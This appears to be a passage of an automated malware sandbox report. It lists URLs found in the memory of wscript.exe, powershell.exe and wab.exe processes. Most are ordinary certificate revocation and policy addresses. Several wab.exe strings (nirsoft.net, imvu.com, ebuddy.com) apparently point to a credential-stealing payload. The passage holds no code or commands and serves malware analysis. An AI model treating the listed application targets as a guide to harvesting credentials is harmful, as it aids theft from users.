              Source: wscript.exe, 00000000.00000003.1623052604.000001ABE88AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
              Source: wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
              Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.postsignum.cz/crl/psrootqca4.crl02
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.postsignum.eu/crl/psrootqca4.crl0
              Source: wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
              Source: wscript.exe, 00000000.00000003.1623115975.000001ABE889F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
              Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
              Source: wscript.exe, 00000000.00000003.1623274472.000001ABE8837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl2.postsignum.cz/crl/psrootqca4.crl01
              Source: wscript.exe, 00000000.00000003.1746252567.000001ABE676E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748409727.000001ABE67A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747626632.000001ABE67A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747456994.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747117797.000001ABE6783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000000.00000003.1746252567.000001ABE676E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747456994.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748349554.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747117797.000001ABE6783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
              Source: wscript.exe, 00000000.00000003.1747324046.000001ABE6757000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747681142.000001ABE6758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748349554.000001ABE6758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enndows
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
              Source: wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
              Source: wscript.exe, 00000000.00000003.1623370554.000001ABE8813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
              Source: powershell.exe, 00000001.00000002.2606411580.000002B7B8242000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2320148012.000000000582A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
              Source: wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
              Source: powershell.exe, 00000005.00000002.2319330594.0000000004919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: wscript.exe, 00000000.00000003.1623370554.000001ABE8813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
              Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623040678.000001ABE88C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
              Source: wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
              Source: wscript.exe, 00000000.00000003.1622254049.000001ABE67A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: wscript.exe, 00000000.00000003.1622254049.000001ABE67A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 00000001.00000002.2525142597.000002B7A81D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2319330594.00000000047C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: wscript.exe, 00000000.00000003.1623323054.000001ABE882A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623383639.000001ABE882D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623335324.000001ABE882B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
              Source: wscript.exe, 00000000.00000003.1622254049.000001ABE67A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1746252567.000001ABE676E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624251674.000001ABE88A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748409727.000001ABE67A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747626632.000001ABE67A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747456994.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747117797.000001ABE6783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: wscript.exe, 00000000.00000003.1622254049.000001ABE67A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1746252567.000001ABE676E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624251674.000001ABE88A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748409727.000001ABE67A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747626632.000001ABE67A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747456994.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747117797.000001ABE6783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: wscript.exe, 00000000.00000003.1622254049.000001ABE67A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1746252567.000001ABE676E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624251674.000001ABE88A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748409727.000001ABE67A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747626632.000001ABE67A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747456994.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747117797.000001ABE6783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
              Source: wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org0
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623246947.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623246947.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
              Source: wscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ancert.com/cps0
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es
              Source: wscript.exe, 00000000.00000003.1623335324.000001ABE8833000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
              Source: powershell.exe, 00000005.00000002.2319330594.0000000004919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wscript.exe, 00000000.00000003.1623323054.000001ABE882A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623383639.000001ABE882D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623335324.000001ABE882B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
              Source: wscript.exe, 00000000.00000003.1623406801.000001ABE881C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623274472.000001ABE8837000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623370554.000001ABE8813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
              Source: wscript.exe, 00000000.00000003.1623646795.000001ABE682D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
              Source: wscript.exe, 00000000.00000003.1623646795.000001ABE682D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
              Source: wscript.exe, 00000000.00000003.1623274472.000001ABE8837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
              Source: wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
              Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623040678.000001ABE88C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
              Source: wscript.exe, 00000000.00000003.1623370554.000001ABE8813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
              Source: wscript.exe, 00000000.00000003.1623052604.000001ABE88AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
              Source: wscript.exe, 00000000.00000003.1623370554.000001ABE8813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
              Source: wscript.exe, 00000000.00000003.1623115975.000001ABE889F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
              Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
              Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
              Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca0f
              Source: wscript.exe, 00000000.00000003.1623274472.000001ABE8848000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623235532.000001ABE8846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dnie.es/dpc0
              Source: wscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-me.lv/repository0
              Source: wscript.exe, 00000000.00000003.1624174488.000001ABE88BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623093541.000001ABE88BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
              Source: wscript.exe, 00000000.00000003.1624174488.000001ABE88BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623093541.000001ABE88BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
              Source: wscript.exe, 00000000.00000003.1623093541.000001ABE88BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
              Source: wscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
              Source: wab.exe, wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wscript.exe, 00000000.00000003.1629349397.000001ABE8882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8880000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1630136990.000001ABE8882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623138797.000001ABE887F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623664338.000001ABE8882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1629143294.000001ABE8882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624136639.000001ABE8882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623615949.000001ABE8882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1629709832.000001ABE8882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
              Source: wscript.exe, 00000000.00000003.1623274472.000001ABE8837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
              Source: wscript.exe, 00000000.00000003.1623274472.000001ABE8837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.eme.lv/repository0
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
              Source: wscript.exe, 00000000.00000003.1623052604.000001ABE88AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0
              Source: wscript.exe, 00000000.00000003.1623052604.000001ABE88AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0=
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
              Source: wab.exe, wab.exe, 0000000F.00000002.2473933419.000000000371D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 0000000F.00000002.2473933419.000000000371D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
              Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
              Source: wab.exe, 0000000D.00000002.2478998922.0000000000113000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
              Source: wscript.exe, 00000000.00000003.1623274472.000001ABE8837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
              Source: wscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
              Source: wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
              Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623040678.000001ABE88C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/cps/0
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
              Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623115975.000001ABE889F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssc.lt/cps03
              Source: wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
              Source: wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623246947.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
